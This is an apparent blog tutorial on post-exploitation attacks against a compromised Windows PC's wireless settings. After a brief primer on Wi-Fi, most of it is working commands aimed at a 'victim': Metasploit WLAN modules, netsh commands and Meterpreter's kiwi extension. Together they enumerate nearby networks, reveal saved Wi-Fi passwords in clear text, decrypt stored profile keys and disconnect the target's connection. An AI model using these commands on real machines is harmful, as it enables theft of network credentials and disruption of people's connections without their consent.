Most of the Security protocols of Wi-Fi networks are often broken or
bypassed exposing the wireless internet traffic to attackers. Through this
article one can learn about different ways to get basic service sets
information of remote user’s Wi-Fi as well as current network connection
information, and how to extract saved Wireless LAN profiles of remote pc after
that you will be disconnecting target user’s Wi-Fi too. All the following
attacks are post exploitation attacks.
Table of Content
- Introduction
- Working of Wi-Fi
- Types of Wi-Fi security
- WLAN BSS List
- WLAN Current Connection
- WLAN Profile
- WLAN Disconnect
- Mimikatz
- Netsh
Introduction
All the wireless networking technology are commonly known as Wi-Fi.
It provides high speed internet as it works on radio waves. Wi-Fi trademark is
owned by the company the Wi-Fi Alliance; it officially defined as Wireless
Local Area Network (WLAN). It is supported by many applications and devices
such as mobile phones, PSAs, OS, Video game consoles, etc. therefore, it lets
all the devices to communicate easily.
Working of Wi-Fi
As the name suggests, Wi-Fi network has no physical connection
between sender and receiver. It uses radio frequency within the electromagnetic
spectrum associated with radio waves. Therefore, it is able to provided high
speed internet. Every Wi-Fi connection works through a Access Point (AP). The
main job of an access point is to broadcast the signal that is further detected
by electronic devices. ones the signal is detected they connect to the Wi-Fi in
order to use Wi-Fi.
Types of Wi-Fi security
- Wired Equivalent Privacy
- Wi-Fi Protected Access
- Wi-Fi protected Access 2
Netsh
Now
that you have session of the victim’s PC, go to the shell and use the following
command to find out the wi-fi connections of victims’ PC over the time ;
netsh wlan show profiles
Get BSS information of a remote user’s Wi-Fi
connection
This module gathers
information about the wireless Basic Service Sets available to the victim machine.
e.g. this will give you SSID
and other important information
regarding wireless connection.
msf > use
post/windows/wlan/wlan_bss_list
msf post(wlan_bss_list) >
set session 5
msf post(wlan_bss_list) >
exploit
As
the above image shows, till date the PC was connected to the Pentest Lab,
Sinos, POCO PHONE, ignit. Now, we can use the following to gain the detailed
information about the network :
netsh wlan show networks mode=bssid
Now,
use the following command to see the password of a particular wi-fi :
netsh wlan show profile name=”ignit” key=clear
Get current Wi-Fi connection
information of a remote user
This module gathers information about the current connection
on each wireless lan interface on the target machine.
msf post(wlan_bss_list) > use
post/windows/wlan/wlan_current_connection
msf post(wlan_current_connection) > set session 5
msf post(wlan_current_connection) > run
Get saved wireless LAN profile of a
remote user
This module extracts saved
Wireless LAN profiles. It will also try to decrypt the network key material.
Behavior is slightly different between OS versions when it comes to WPA. In
Windows Vista/7 we will get the passphrase. In Windows XP we will get the
PBKDF2 derived key.
msf post(wlan_current_connection) > use
post/windows/wlan/wlan_profile
msf post(wlan_profile) > set session 5
msf post(wlan_profile) > exploit
Disconnect a remote user’s Wi-Fi
connection
This module disconnects the current wireless network connection
on the specified interface.
msf > use post/windows/wlan/wlan_disconnect
msf post(wlan_disconnect) > set session 5
msf post(wlan_disconnect) > exploit
Other Way
I call it a post-exploitation
toolkit because it has a lot of features, far beyond the ability to dump
plain-text passwords.
meterpreter > load
kiwi
meterpreter > help
this will give you entire
wireless connection list with passwords as well. VOILA! You got it right.
meterpreter > wifi_list
meterpreter >
wifi_list_shared
0 comments:
Post a Comment